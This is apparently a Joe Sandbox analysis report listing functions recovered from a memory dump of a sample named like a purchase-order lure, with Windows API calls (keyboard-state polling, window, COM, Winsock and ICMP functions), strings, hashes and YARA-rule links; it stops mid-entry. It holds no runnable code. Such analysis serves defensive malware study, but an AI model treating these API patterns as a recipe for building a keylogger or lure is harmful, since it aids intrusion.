API String ID: 1246142700-0
Opcode ID: b29a6f989df6d380b34fc3c21809466ccc5bc947e8d003b8f2bc98bc42ab0799
Instruction ID: 3586f6fd98b86659115b9bfb8829d1e59e8e8623d16e807983909ebb0081da27
Opcode Fuzzy Hash: b29a6f989df6d380b34fc3c21809466ccc5bc947e8d003b8f2bc98bc42ab0799
Instruction Fuzzy Hash: 0DB1FA75A00109AFDB04DFA5C888DAEBBB9FF48305B1484AAF905EB251DB34ED45CF54

Function 00442E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00442ED6
SetKeyboardState.USER32(?), ref: 00442F41
GetAsyncKeyState.USER32(000000A0), ref: 00442F61
GetKeyState.USER32(000000A0), ref: 00442F78
GetAsyncKeyState.USER32(000000A1), ref: 00442FA7
GetKeyState.USER32(000000A1), ref: 00442FB8
GetAsyncKeyState.USER32(00000011), ref: 00442FE4
GetKeyState.USER32(00000011), ref: 00442FF2
GetAsyncKeyState.USER32(00000012), ref: 0044301B
GetKeyState.USER32(00000012), ref: 00443029
GetAsyncKeyState.USER32(0000005B), ref: 00443052
GetKeyState.USER32(0000005B), ref: 00443060

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 83d05710d7bc35541dbc9f2eed5bfe7989f5dcf0168877b9afbe318fe6ee6b74
Instruction ID: 9c45705a8db000e6a4ee7a8628f9c376aea548831c4a3dd55c4c2afd4bab552e
Opcode Fuzzy Hash: 83d05710d7bc35541dbc9f2eed5bfe7989f5dcf0168877b9afbe318fe6ee6b74
Instruction Fuzzy Hash: 39512860A0478429FB35DFA089007EBBFF45F11744F88459FD5C2562C2DA9CAB8CC76A

Function 0043ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0043ED1E
GetWindowRect.USER32(00000000,?), ref: 0043ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0043ED8E
GetDlgItem.USER32(?,00000002), ref: 0043ED99
GetWindowRect.USER32(00000000,?), ref: 0043EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0043EE01
GetDlgItem.USER32(?,000003E9), ref: 0043EE0F
GetWindowRect.USER32(00000000,?), ref: 0043EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0043EE63
GetDlgItem.USER32(?,000003EA), ref: 0043EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0043EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0043EE9B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: b465c413cca5253bdedd3256ff6a12ecff45f755c229ed3141aa91a502673eff
Instruction ID: 00737507538eb1ccc85ebbe3006c59c153ea565c734b707143fa93c06e9301c0
Opcode Fuzzy Hash: b465c413cca5253bdedd3256ff6a12ecff45f755c229ed3141aa91a502673eff
Instruction Fuzzy Hash: 7D512171B01209AFDB18DF69CD85AAEBBBAEB88310F14852DF519E72D0E7749D008B14

Function 0041B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0041B759,?,00000000,?,?,?,?,0041B72B,00000000,?), ref: 0041BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0041B72B), ref: 0041B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0041B88D
DestroyAcceleratorTable.USER32(00000000), ref: 0047D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0047D90A
DeleteObject.GDI32(00000000), ref: 0047D91C

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: cc5009a6664bfdf172fa232ae460902a89c38e792acc26aefb42bef20774d501
Instruction ID: aeda5f4c58aedfe1ab235c20283fe4d5ea771f7082be7751d6cf8c6703a47079
Opcode Fuzzy Hash: cc5009a6664bfdf172fa232ae460902a89c38e792acc26aefb42bef20774d501
Instruction Fuzzy Hash: 7961AB70A01600CFDB26AF15DD88BAAB7B5FF85715F14452FE04686AB0C738A8D1DB8D

Function 0041B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

GetSysColor.USER32(0000000F), ref: 0041B438

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e868dbce59ca00f1a870f8d48a8e8e3763aace955db75823c8fdb3b889784903
Instruction ID: 9056983834b32c36ed4150570584b1c03209aeafd6b8b45defaf711a91559013
Opcode Fuzzy Hash: e868dbce59ca00f1a870f8d48a8e8e3763aace955db75823c8fdb3b889784903
Instruction Fuzzy Hash: 3041C530541100AFDF216F68DC89BFA3766EF46730F148666FDA58A2E6C7348C81C769

Function 0044690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00446923
_wcscpy.LIBCMT ref: 00446934
__wsplitpath.LIBCMT ref: 00446958
__wsplitpath.LIBCMT ref: 00446979
_wcscpy.LIBCMT ref: 0044699B
_wcscpy.LIBCMT ref: 004469B9
_wcscpy.LIBCMT ref: 004469C7
_wcscat.LIBCMT ref: 004469D6
_wcscat.LIBCMT ref: 00446A2B
_wcscat.LIBCMT ref: 00446A61
_wcscat.LIBCMT ref: 00446A73

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: d61e9edc43eb21dc305860e20555fab4e9811c7e7a0782106bb1dba9aa94a74c
Instruction ID: 005bd8409d3bb68de46a5ddcaf555a5972e9497e9b379132242b511ffcb9ea52
Opcode Fuzzy Hash: d61e9edc43eb21dc305860e20555fab4e9811c7e7a0782106bb1dba9aa94a74c
Instruction Fuzzy Hash: 3C417EB694512CAFDF61EB91DC85DCB73BCEB44300F4001A7F649A2051EA74ABE88F59

Function 0044D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0049DC00,0049DC00,0049DC00), ref: 0044D7CE
GetDriveTypeW.KERNEL32(?,004B3A70,00000061), ref: 0044D898
_wcscpy.LIBCMT ref: 0044D8C2

Strings

cdrom, xrefs: 0044D7EA
all, xrefs: 0044D7D4
network, xrefs: 0044D82C
removable, xrefs: 0044D800
unknown, xrefs: 0044D859
ramdisk, xrefs: 0044D842
fixed, xrefs: 0044D816

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 05a03708d9273325090b6b30521337a4353a8d21da9606f810c1ad8ee856c399
Instruction ID: 6215e8b66333fdb673da60b32a2a8998b562a6f15a09a5f6086e7d3bbaedb77f
Opcode Fuzzy Hash: 05a03708d9273325090b6b30521337a4353a8d21da9606f810c1ad8ee856c399
Instruction Fuzzy Hash: BB51F734504301AFD700EF15DC91AAFB7A5EF84318F20882FF8A957292EB38DD45CA4A

Function 0040936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004093AB
__itow.LIBCMT ref: 004093DF

Part of subcall function 00421557: _xtow@16.LIBCMT ref: 00421578

Strings

%.15g, xrefs: 004093A5
True, xrefs: 00474C8C
False, xrefs: 00474C93
0x%p, xrefs: 00474CAD

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 207c6abc436d26d0a3691c9157cab4cc8e8e9b0395153aeb665da96316a453a2
Instruction ID: 0ed78e77f9698b809d02e899a200000ec7101b462ac89f610c664c3257f1291c
Opcode Fuzzy Hash: 207c6abc436d26d0a3691c9157cab4cc8e8e9b0395153aeb665da96316a453a2
Instruction Fuzzy Hash: 8A41C571600204AFDB249F75D941EBA73E4EB88304F20447FE549D72D2EB39AD42CB59

Function 0046A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0046A259
CreateCompatibleDC.GDI32(00000000), ref: 0046A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0046A273
SelectObject.GDI32(00000000,00000000), ref: 0046A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0046A286
DeleteDC.GDI32(00000000), ref: 0046A28F
GetWindowLongW.USER32(?,000000EC), ref: 0046A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0046A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0046A2B9

Strings

static, xrefs: 0046A1F1

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 74dda4391d8f9ed3ccbc10c67c3b095b7ad687f0d967076ff53b44dfc30fd87d
Instruction ID: 986c0112dff5ea32e0688fc01ade664d254e7fb72aa65afae893e1e38ea2680e
Opcode Fuzzy Hash: 74dda4391d8f9ed3ccbc10c67c3b095b7ad687f0d967076ff53b44dfc30fd87d
Instruction Fuzzy Hash: 9631AF31501118ABDF115FA4DC49FEF3B69FF09324F100229FA19A22E0D739D821DB6A

Function 00446F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00446F1D
gethostname.WSOCK32(?,00000100), ref: 00446F37
gethostbyname.WSOCK32(?), ref: 00446F44
_wcscpy.LIBCMT ref: 00446F6C
inet_ntoa.WSOCK32(?), ref: 00446F8A
_strcat.LIBCMT ref: 00446F98
_wcscpy.LIBCMT ref: 00446FAF
WSACleanup.WSOCK32 ref: 00446FBD
_wcscpy.LIBCMT ref: 00446FCB

Strings

0.0.0.0, xrefs: 00446F66

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: d95e556309437f2d4b01627dc1c32f846f8ca4c31db75ee937686d82ca629b62
Instruction ID: 9ff267ec6d560c425b52b79f1213ef4c92f4d937c1e0f718be36d2864fea819c
Opcode Fuzzy Hash: d95e556309437f2d4b01627dc1c32f846f8ca4c31db75ee937686d82ca629b62
Instruction Fuzzy Hash: 72112731904114AFEB146B61AC49EDE77ACEF01714F01007BF44592082EF78AE85875D

Function 0042500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00425047

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__gmtime64_s.LIBCMT ref: 004250E0
__gmtime64_s.LIBCMT ref: 00425116
__gmtime64_s.LIBCMT ref: 00425133
__allrem.LIBCMT ref: 00425189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004251A5
__allrem.LIBCMT ref: 004251BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004251DA
__allrem.LIBCMT ref: 004251F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042520F
__invoke_watson.LIBCMT ref: 00425280

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 90e1e9256e69eabba9ee52f5690f89fe01e33d53c5fc913f30279bab376557cd
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 3E71D771B00B26ABE7149E79DC41B6AB3A8AF14368F54426FF410D63C1E778DD408BD8

Function 00444DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00444DF8
GetMenuItemInfoW.USER32(004C1708,000000FF,00000000,00000030), ref: 00444E59
SetMenuItemInfoW.USER32(004C1708,00000004,00000000,00000030), ref: 00444E8F
Sleep.KERNEL32(000001F4), ref: 00444EA1
GetMenuItemCount.USER32(?), ref: 00444EE5
GetMenuItemID.USER32(?,00000000), ref: 00444F01
GetMenuItemID.USER32(?,-00000001), ref: 00444F2B
GetMenuItemID.USER32(?,?), ref: 00444F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00444FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444FEB

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 4a1e69a52a26fff927a18392969245bc3bb0152db4d396db6c4dc7db864403c1
Instruction ID: fe9dd4acc330e0067c0764243ddef19340b974bd8c93f78c1856fcd7b282a81b
Opcode Fuzzy Hash: 4a1e69a52a26fff927a18392969245bc3bb0152db4d396db6c4dc7db864403c1
Instruction Fuzzy Hash: 5A618071900289EFEB11CFA4D884EAF7BB8FB85308F14055BF541A7291D739AD49CB29

Function 004394E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004394FE
SafeArrayAllocData.OLEAUT32(?), ref: 00439549
VariantInit.OLEAUT32(?), ref: 0043955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0043957B
VariantCopy.OLEAUT32(?,?), ref: 004395BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 004395D2
VariantClear.OLEAUT32(?), ref: 004395E7
SafeArrayDestroyData.OLEAUT32(?), ref: 004395F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004395FD
VariantClear.OLEAUT32(?), ref: 0043960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0043961A

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bed0439e2b7beaf883a6717116f74a8cb8083123d44484a5f0b235fb7ecd000e
Instruction ID: e980d16f425cbb2d7f1633ed62324256478b1fd8f64321c89d047c85fae3fde7
Opcode Fuzzy Hash: bed0439e2b7beaf883a6717116f74a8cb8083123d44484a5f0b235fb7ecd000e
Instruction Fuzzy Hash: E4414F31D01219AFCB01EFA4DC849DEBB79FF08754F00846AE552A3251DB74EA85CBA9

Function 0045ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CoInitialize.OLE32 ref: 0045ADF6
CoUninitialize.OLE32 ref: 0045AE01
CoCreateInstance.OLE32(?,00000000,00000017,0048D8FC,?), ref: 0045AE61
IIDFromString.OLE32(?,?), ref: 0045AED4
VariantInit.OLEAUT32(?), ref: 0045AF6E
VariantClear.OLEAUT32(?), ref: 0045AFCF

Strings

NULL Pointer assignment, xrefs: 0045AEA6
Failed to create object, xrefs: 0045AE6C, 0045AF22
Invalid parameter, xrefs: 0045AEED

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: d2430af211e6283dd56d6ad4109776fc80f67fdeaeead523f8fa391f47edb8cb
Instruction ID: c20346a15e988a54f04bac49df2388cda8baec57d7b2c93a2b2cfcbf474f938e
Opcode Fuzzy Hash: d2430af211e6283dd56d6ad4109776fc80f67fdeaeead523f8fa391f47edb8cb
Instruction Fuzzy Hash: AB61AA712082019FD710EF54C885B6BB7E8AF48705F104A1EF9859B292C738ED48CB9B

Function 00458107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00458168
inet_addr.WSOCK32(?,?,?), ref: 004581AD
gethostbyname.WSOCK32(?), ref: 004581B9
IcmpCreateFile.IPHLPAPI ref: 004581C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00458237
